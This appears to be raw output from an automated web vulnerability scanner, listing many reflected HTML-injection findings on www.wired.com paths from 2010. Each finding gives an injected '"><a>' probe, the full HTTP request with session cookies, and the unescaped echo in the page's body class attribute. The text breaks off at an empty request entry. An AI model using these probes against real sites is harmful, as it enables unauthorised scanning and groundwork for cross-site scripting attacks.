The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fee"><a>4d894af57f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/newsf1fee"><a>4d894af57f2/2005/01/66359 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:04 GMT Date: Sun, 21 Nov 2010 23:07:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_newsf1fee"><a>4d894af57f2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839c3"><a>d95b402d7c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /customerservice839c3"><a>d95b402d7c8 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29343 Vary: Accept-Encoding Cache-Control: max-age=224 Expires: Mon, 22 Nov 2010 01:13:02 GMT Date: Mon, 22 Nov 2010 01:09:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_customerservice839c3"><a>d95b402d7c8"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ac8"><a>98e7490e5ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainmenta7ac8"><a>98e7490e5ae HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29320 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:45 GMT Date: Mon, 22 Nov 2010 01:10:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainmenta7ac8"><a>98e7490e5ae"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5df5b"><a>b5f8392314c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment5df5b"><a>b5f8392314c/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=230 Expires: Sun, 21 Nov 2010 20:16:27 GMT Date: Sun, 21 Nov 2010 20:12:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment5df5b"><a>b5f8392314c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f82"><a>c6b1ca3f8f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment94f82"><a>c6b1ca3f8f7/hollywood HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29343 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:11:30 GMT Date: Sun, 21 Nov 2010 23:07:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment94f82"><a>c6b1ca3f8f7 ss_hollywood"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5fc"><a>d3f7037435e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/hollywoodce5fc"><a>d3f7037435e HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29343 Vary: Accept-Encoding Cache-Control: max-age=574 Expires: Sun, 21 Nov 2010 23:17:52 GMT Date: Sun, 21 Nov 2010 23:08:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_hollywoodce5fc"><a>d3f7037435e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 224ea"><a>7c815694db5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment224ea"><a>7c815694db5/music HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29335 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:11:32 GMT Date: Sun, 21 Nov 2010 23:07:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment224ea"><a>7c815694db5 ss_music"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c9b2"><a>b28c0d05be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music3c9b2"><a>b28c0d05be9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29335 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:03 GMT Date: Sun, 21 Nov 2010 23:08:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_music3c9b2"><a>b28c0d05be9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3385f"><a>f8dbe2114f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment3385f"><a>f8dbe2114f4/music/news/2004/04/63263 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment3385f"><a>f8dbe2114f4 ss_music c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db81"><a>8eb418e94bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music4db81"><a>8eb418e94bf/news/2004/04/63263 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:21 GMT Date: Sun, 21 Nov 2010 23:07:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_music4db81"><a>8eb418e94bf c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d39"><a>b304160c724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music/news70d39"><a>b304160c724/2004/04/63263 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:36 GMT Date: Sun, 21 Nov 2010 23:07:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_music c_news70d39"><a>b304160c724"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f72e"><a>b56d3b0469f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment8f72e"><a>b56d3b0469f/music/news/2005/07/68124 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:29 GMT Date: Sun, 21 Nov 2010 23:07:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment8f72e"><a>b56d3b0469f ss_music c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8292"><a>527abd9bf12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/musicd8292"><a>527abd9bf12/news/2005/07/68124 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:02 GMT Date: Sun, 21 Nov 2010 23:08:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_musicd8292"><a>527abd9bf12 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ab"><a>79fd2601542 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music/news794ab"><a>79fd2601542/2005/07/68124 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:22 GMT Date: Sun, 21 Nov 2010 23:08:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_music c_news794ab"><a>79fd2601542"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0dc"><a>6d583e3f06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment7e0dc"><a>6d583e3f06/theweb HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29335 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Sun, 21 Nov 2010 23:11:12 GMT Date: Sun, 21 Nov 2010 23:07:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment7e0dc"><a>6d583e3f06 ss_theweb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ebb"><a>01d211d6eae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/theweb52ebb"><a>01d211d6eae HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29337 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:02 GMT Date: Sun, 21 Nov 2010 23:08:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_theweb52ebb"><a>01d211d6eae"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f0b"><a>06f0bc5b429 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets24f0b"><a>06f0bc5b429 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29331 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:14:33 GMT Date: Mon, 22 Nov 2010 01:10:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets24f0b"><a>06f0bc5b429"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d3c4"><a>44e9ad792ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets5d3c4"><a>44e9ad792ff/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29332 Vary: Accept-Encoding Cache-Control: max-age=224 Expires: Sun, 21 Nov 2010 20:17:08 GMT Date: Sun, 21 Nov 2010 20:13:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets5d3c4"><a>44e9ad792ff"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f24"><a>01629cf0b9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
